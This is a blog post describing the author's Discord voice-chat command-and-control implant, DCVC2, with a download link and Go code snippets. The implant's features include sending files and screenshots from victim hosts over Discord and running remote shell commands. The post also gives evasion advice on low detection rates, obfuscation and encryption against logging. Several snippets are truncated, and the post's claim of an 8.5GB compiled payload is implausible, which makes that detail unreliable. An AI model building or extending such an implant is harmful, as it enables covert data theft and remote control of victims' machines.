Using Discord's Voice Channel for C2 Operations

April 25th, 2023 By Vincent Mentz
Download: DCVC2


Many malware authors have attempted to use Discord for command and control (C2) operations, and most of these attempts resemble one another in some way, shape, or form. Most commonly, Discord malware authors rely on Discord's basic functionality, such as text chats to communicate with their bot, or file upload and storage capabilities. This is accomplished by generating a bot through a Discord user's account and using the Discord API while hosting data on Discord's CDN. These bots can interact just like normal users but have many added features which allow automation of tasks via webhooks and the Discord API. Because I love esoteric and novel malware, I decided to try my hand at building a simple Discord-based implant which leverages a less common transport: voice chat.

Discord voice chat operates over the Real-time Transport Protocol (RTP), and although I had never interacted with RTP at the protocol level, I was not deterred. My objective was simple: learn what it would take to successfully send and receive an RTP packet with arbitrary data attached through Discord, and be able to build payloads compatible with multiple operating systems (Windows/Linux/OSX) that require no extra steps other than a user double-clicking or executing the payload via some other method, e.g., injecting shellcode. This seemed difficult initially because while writing this agent, I was simultaneously learning Golang (hence the chicken scratch code) and using this as an exercise to grow my capabilities. I was right and wrong, but boy was this fun!

Adventure Time:

My first step whenever diving into a new objective is to check whether anyone else has already created what I want to create. This typically determines how I plan to proceed. After doing some hunting, I found nothing relating to leveraging Discord voice chat for anything other than playing music. My next step was to see if there were any existing Golang libraries that I might leverage to shorten the development cycle. Sure enough, a search for a Discord Golang library turned one up, and its claim of full Discord API interoperability was enticing enough for me to sink my teeth into it as a starting point.

DiscordGo is a Go package that provides low level bindings to the Discord chat client API. DiscordGo has nearly complete support for all of the Discord API endpoints, websocket interface, and voice interface.

Sending Data:

Many Discord bots use the voice interface to play music or queue audio snippets of some sort. I began to search the library for the logic which implemented the voice channel interactions. I quickly found a code snippet that plays an airhorn when a specific command such as '!airhorn' is entered in a text channel in the same Discord server (code is located here). This snippet allows you to play any audio cue you want after encoding an mp3 file with FFmpeg. After you have prepared a ".dca" formatted audio file, the code snippet will load the file into an int16 chunked buffer, then pass the buffer to an Opus wrapper which will send the packets over voice chat. Structuring the data properly is the most important step in sending RTP packets over Discord's voice chat.

I needed to strip the airhorn code snippet down to bare bones because, rather than audio cues, I needed to send arbitrary data. Deconstructing the code as much as I could led me to strip the main.go sample down to a single function. This function was the playSound function, which I modified to look like so:

func playSound(s *discordgo.Session, guildID, channelID string) {
   vc, _ := s.ChannelVoiceJoin(guildID, channelID, false, true)
   i := 0
   for _, h := range chunks {
      tmp = append(tmp, h)
      for _, chunk := range tmp {
         size := [][]byte{[]byte(info + delimiter)}
         size_new := bytes.Join(size, nil)
         size_chunk := chunk_buffer(size_new, 990)
         new_chunk := append(size_chunk, chunk)
         a := bytes.Join(new_chunk, nil)
         vc.OpusSend <- a
         tmp = make([][]byte, 0)
         fmt.Println("Sent Chunk ", i, " / ", len(chunks))
         if i == len(chunks) {
            fmt.Println(info + " Has been sent!")

By deconstructing the code and gaining an understanding of how the data in the audio buffer was structured, I was able to digest any data then package that in the Opus wrapper and send it across Discord's voice chat! This was a neat moment because normally when I'm developing, I don't hear the result....

Me and the bot in the voice channel. Press play below to enter the Matrix....

Sitting in this voice chat and running my data transmission results in a surreal Matrix-esque experience which sounds like data "should" sound going over the wire. 🤣 Have a listen!

Receiving Data:

Sending data was half the challenge. Receiving it and making sense of it was also interesting. Looking through the DiscordGo library revealed yet another gem to help us out here :). This code snippet makes use of "listening" in a voice channel to save a ten second recording. This recording gets saved to ".ogg" files based on the audio source (more than one user might be in the voice channel). According to the readme, it is possible to uniquely identify each account transmitting data based on its SSRC (the RTP synchronization source identifier). I didn't implement DCVC2 in a multi-agent capacity but this would be a good exercise for the reader. The goal would be to identify multiple agents that join the voice channel and parse their incoming data streams uniquely (*cough cough* make a pull request if you do this).

Another challenge of this project is that Discord uses RTP over UDP, meaning packets are sent at a max of 96 kbps with no guarantee of delivery or ordering. Writing an agent which operates over UDP is like trying to spit a mouthful of water into the entry hole of a deflated balloon from 10 inches away. You're going to spill a lot of water, or in this instance lose a bunch of packets during transmission. Because of this issue, I found it necessary to track which chunks of data were making it across the wire and in what sequence. I incorporated some rudimentary tracking of the chunks by prepending some data to the packets sent. I used this same method to identify what type of data was being transmitted: file transfer, screenshot, or a shell command. This helped keep the integrity of the data intact.
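To make the idea of prepending tracking data concrete, here is a minimal sketch of one way a chunk header and a reassembly buffer could look. It is not the layout DCVC2 actually uses. The `frame` type, its `kind|||seq|||total|||payload` layout, and the `reassembler` helper are all hypothetical names made up for illustration. Only the "|||" delimiter is borrowed from the snippets in this post.

```go
package main

import (
	"bytes"
	"fmt"
	"strconv"
)

// delimiter matches the "|||" separator seen in the post's snippets.
const delimiter = "|||"

// frame is a hypothetical wire layout: kind|||seq|||total|||payload.
type frame struct {
	kind    string
	seq     int
	total   int
	payload []byte
}

// encode prepends the tracking header to the payload.
func (f frame) encode() []byte {
	header := f.kind + delimiter + strconv.Itoa(f.seq) + delimiter + strconv.Itoa(f.total) + delimiter
	return append([]byte(header), f.payload...)
}

// decode splits a packet into at most four fields, so a payload that
// happens to contain the delimiter is left intact.
func decode(pkt []byte) (frame, error) {
	parts := bytes.SplitN(pkt, []byte(delimiter), 4)
	if len(parts) != 4 {
		return frame{}, fmt.Errorf("malformed frame: %d fields", len(parts))
	}
	seq, err := strconv.Atoi(string(parts[1]))
	if err != nil {
		return frame{}, fmt.Errorf("bad sequence number: %w", err)
	}
	total, err := strconv.Atoi(string(parts[2]))
	if err != nil {
		return frame{}, fmt.Errorf("bad total: %w", err)
	}
	return frame{kind: string(parts[0]), seq: seq, total: total, payload: parts[3]}, nil
}

// reassembler stores chunks by sequence number, so arrival order does not matter.
type reassembler struct {
	total  int
	chunks map[int][]byte
}

func newReassembler(total int) *reassembler {
	return &reassembler{total: total, chunks: make(map[int][]byte)}
}

// add records a chunk; duplicates and out-of-range sequence numbers are ignored.
func (r *reassembler) add(f frame) {
	if f.seq < 0 || f.seq >= r.total {
		return
	}
	if _, seen := r.chunks[f.seq]; !seen {
		r.chunks[f.seq] = f.payload
	}
}

// missing lists the sequence numbers that have not arrived.
func (r *reassembler) missing() []int {
	var gaps []int
	for i := 0; i < r.total; i++ {
		if _, ok := r.chunks[i]; !ok {
			gaps = append(gaps, i)
		}
	}
	return gaps
}

// data returns the payloads joined in order, or false if any chunk is missing.
func (r *reassembler) data() ([]byte, bool) {
	if len(r.missing()) > 0 {
		return nil, false
	}
	var out []byte
	for i := 0; i < r.total; i++ {
		out = append(out, r.chunks[i]...)
	}
	return out, true
}

func main() {
	r := newReassembler(3)
	// Chunks arrive out of order, and chunk 1 is lost in transit.
	for _, f := range []frame{
		{kind: "file", seq: 2, total: 3, payload: []byte("!")},
		{kind: "file", seq: 0, total: 3, payload: []byte("hi")},
	} {
		got, err := decode(f.encode())
		if err != nil {
			fmt.Println(err)
			continue
		}
		r.add(got)
	}
	fmt.Println("missing:", r.missing()) // prints "missing: [1]"
}
```

Carrying the total count in every header is a design choice in this sketch: the receiver can tell what is missing even if the first packet is the one that gets dropped.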

I stripped down the "listening" code to remove any unnecessary bloat. I was able to reduce the listener to only require the voice channel join code and a simple loop which processes any RTP packets being received. This meant that the listener/server stays joined in the voice channel at all times instead of joining momentarily to listen. I followed the same logic for the agent so that commands could be captured from the server, executed on the victim host, and the results sent back to the server. Here is a snippet from the DCVC2 server which handles incoming RTP packets.

func handleVoice(c chan *discordgo.Packet) {
   for p := range c {
      data := strings.Split(string(p.Opus), "|||")
      if data[0] == "Run-Command" {
         fmt.Println("\n" + data[1])
      } else if data[0] == "Download" {
         f, _ := os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)
      } else if data[0] == "Screenshot" {
         f, _ := os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)

Agent Functionality:

Now that I could send and receive data, it was time to add some basic functionality, considering it is an "agent" after all :D. I mentioned earlier that three capabilities were added: file transfer, screenshot, and shell commands. There is nothing fancy happening under the hood for any of these things. The file transfer uses Go's "ioutil.ReadFile" function to read file data from the victim host and shove it into little 950 byte chunks to send over. The server uses "os.OpenFile(data[1], os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0600)" to write to the server's local disk. To take screenshots, I found an intuitive library which will screenshot every display connected to the victim host. This library made screenshotting a breeze, and the same concept of reading into memory and sending results over the wire was applied. Finally, executing shell commands is once again very rudimentary and uses Go's "exec.Command" function, passing in ("cmd", "/C", command) to run commands. I know this method of command execution is not good for red teaming, so feel free to implement something more sophisticated and make a pull request!
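The chunking step is simple enough to sketch on its own. The snippet below shows one way to split a byte slice into pieces of at most 950 bytes. The `chunkBuffer` name and signature are assumptions made for illustration, since the helper used in DCVC2 is not shown in this post, and the input here is just a zero-filled buffer standing in for file contents.

```go
package main

import "fmt"

// chunkBuffer is a hypothetical helper that splits data into pieces of at
// most size bytes. The final piece may be shorter than size.
func chunkBuffer(data []byte, size int) [][]byte {
	if size <= 0 {
		return nil
	}
	chunks := make([][]byte, 0, (len(data)+size-1)/size)
	for start := 0; start < len(data); start += size {
		end := start + size
		if end > len(data) {
			end = len(data)
		}
		// Each chunk is a sub-slice of data, so nothing is copied here.
		chunks = append(chunks, data[start:end])
	}
	return chunks
}

func main() {
	// A zero-filled buffer stands in for data read from disk.
	data := make([]byte, 2000)
	for i, c := range chunkBuffer(data, 950) {
		fmt.Println("chunk", i, "length", len(c))
	}
}
```

With 2000 bytes of input and a chunk size of 950, this yields chunks of 950, 950, and 100 bytes. Because the chunks share memory with the input slice, the caller should copy them if the input is going to be modified afterwards.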


With the three basic capabilities baked in and working smoothly, I felt that I had taken this proof of concept far enough for the time being. With the C2 communication happening entirely over Discord voice without the need to have the Discord client installed, I am very pleased with the result. With that said, I would personally refrain from using Discord as a command and control server because of its speed limitations and logging (recording of voice conversations). However, you may find it useful for various other operations. I really wanted to create this to inspire myself and others to view strange channels as opportunities for C2 communication.

Closing Thoughts:

Do I think it's worth it to expand upon what I've built?

A resounding yes. If I had the bandwidth, I'd consider adding much more functionality to both the server and agent, such as multi-agent operability and better methods of command execution. It really wouldn't be too difficult to adapt other Golang tools to this technique, and I'd encourage anyone to do so! I also think that this has potential for SOCKS proxying, which would be a really cool addition to the project.

Does this get detected by EDR/XDR?

I don't have access to any top-of-the-line XDRs at the moment, but currently there are 0/26 detections. This may sound impressive, but when a payload has very little sophistication, it is highly unlikely to get detected by anything really. The compilation of this payload also results in an 8.5GB file which could easily be reduced by running it through a tool like Garble.

What ways could this be improved?

- The biggest thing would be implementing end-to-end encryption. This would neuter any attempt by Discord to log the voice conversation.

- Take this method and apply it to a more robust C2 like Cobalt Strike, Sliver, Havoc, etc.

- Multiplayer and multi-agent operability


Vincent Mentz - @sm00v
